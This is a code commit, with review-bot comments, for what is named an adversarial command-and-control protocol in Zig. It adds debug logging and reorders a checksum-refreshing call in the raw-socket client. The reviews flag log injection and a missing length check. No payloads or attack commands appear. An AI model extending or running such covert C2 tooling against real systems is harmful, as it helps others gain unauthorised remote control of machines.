Adversarial C2 Protocol Implemented in Zig


Fix checksum issue

+22 -1
+8
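--- a/src/Client.zig
+++ b/src/Client.zig
@@ -95,12 +95,15 @@
 },
 };
 
+log.debug("Setting bpf filter to port {}", .{connection.connection.src});
 try self.socket.attachSaprusPortFilter(connection.connection.src);
+log.debug("bpf set", .{});
 
 var connection_buf: [2048]u8 = undefined;
 var connection_bytes = connection.toBytes(&connection_buf);
 headers.setPayloadLen(connection_bytes.len);
 
+log.debug("Building full message", .{});
 var full_msg = blk: {
 var msg_buf: [2048]u8 = undefined;
 var msg_w: Writer = .fixed(&msg_buf);
@@ -108,17 +111,21 @@
 msg_w.writeAll(connection_bytes) catch unreachable;
 break :blk msg_w.buffered();
 };
+log.debug("Built full message. Sending message", .{});
 
 try self.socket.send(full_msg);
 var res_buf: [4096]u8 = undefined;
 
 // Ignore response from sentinel, just accept that we got one.
+log.debug("Awaiting handshake response", .{});
 _ = try self.socket.receive(&res_buf);
 try io.sleep(.fromMilliseconds(40), .real);
 
 headers.udp.dst_port = udp_dest_port;
 headers.ip.id = rand.int(u16);
+headers.setPayloadLen(connection_bytes.len);
 
+log.debug("Building final handshake message", .{});
 full_msg = blk: {
 var msg_buf: [2048]u8 = undefined;
 var msg_w: Writer = .fixed(&msg_buf);
@@ -140,3 +147,4 @@
 const std = @import("std");
 const Io = std.Io;
 const Writer = std.Io.Writer;
+const log = std.log;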
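Review bot: The added `headers.setPayloadLen(connection_bytes.len);` at new line 126 passes a length that has not changed since line 104, so it is evidently called only for a side effect, and nothing at the call site says so. Going by the commit title, that side effect is presumably recomputing the header checksums after `udp.dst_port` and `ip.id` are rewritten; the body of `setPayloadLen` is not visible here, so confirm this. I would add a comment above the call such as `// Must run after the last header mutation: setPayloadLen also refreshes the checksums.`, otherwise a later cleanup may remove the "redundant" call or reorder it. The same ordering dependency is introduced in `send` in src/Connection.zig (new lines 44-45) and deserves the same comment. The enclosing function starts and ends outside these hunks.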
+11 -1
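--- a/src/Connection.zig
+++ b/src/Connection.zig
@@ -14,12 +14,16 @@
 
 pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
 _ = io;
+log.debug("Awaiting connection message", .{});
 const res = try self.socket.receive(buf);
+log.debug("Received {} byte connection message", .{res.len});
 const connection_res = blk: {
 const msg: SaprusMessage = try .parse(res[42..]);
 break :blk msg.connection;
 };
 
+log.debug("Payload was {s}", .{connection_res.payload});
+
 return connection_res.payload;
 }
 
@@ -28,6 +32,8 @@
 const io_source: std.Random.IoSource = .{ .io = io };
 break :blk io_source.interface();
 };
+
+log.debug("Sending connection message", .{});
 
 self.connection.connection.payload = buf;
 const connection_bytes = blk: {
@@ -35,8 +41,8 @@
 break :blk self.connection.toBytes(&connection_bytes);
 };
 
-self.headers.setPayloadLen(connection_bytes.len);
 self.headers.ip.id = rand.int(u16);
+self.headers.setPayloadLen(connection_bytes.len);
 
 const full_msg = blk: {
 var msg_buf: [2048]u8 = undefined;
@@ -47,11 +53,15 @@
 };
 
 try self.socket.send(full_msg);
+
+log.debug("Sent {} byte connection message", .{full_msg.len});
 }
 
 const std = @import("std");
 const Io = std.Io;
 const Writer = std.Io.Writer;
+
+const log = std.log;
 
 const SaprusMessage = @import("./message.zig").Message;
 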
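Review bot: In `next`, the new `log.debug("Payload was {s}", .{connection_res.payload});` writes bytes received from the network verbatim into the log. A peer can therefore put newlines or terminal control sequences into log output, and payload contents end up wherever debug logs are kept. Logging the size is enough for tracing this fix: `log.debug("Payload was {} bytes", .{connection_res.payload.len});`. Separately, the new "Received {} byte" line sits directly above `res[42..]`, which has no visible length guard, so a frame shorter than 42 bytes trips the bounds check in safe builds and is undefined behaviour in ReleaseFast. A check such as `if (res.len < 42) return error.ShortMessage;` before the parse would turn that into an ordinary error.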
+3
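--- a/src/main.zig
+++ b/src/main.zig
@@ -100,7 +100,9 @@
 
 if (flags.connect != null) {
 reconnect: while (true) {
+log.debug("Starting connection", .{});
 var connection = try client.connect(init.io, flags.connect.?);
+log.debug("Connection started", .{});
 
 while (true) {
 var res_buf: [2048]u8 = undefined;
@@ -156,6 +158,7 @@
 
 const builtin = @import("builtin");
 const std = @import("std");
+const log = std.log;
 const ArrayList = std.ArrayList;
 const StaticStringMap = std.StaticStringMap;
 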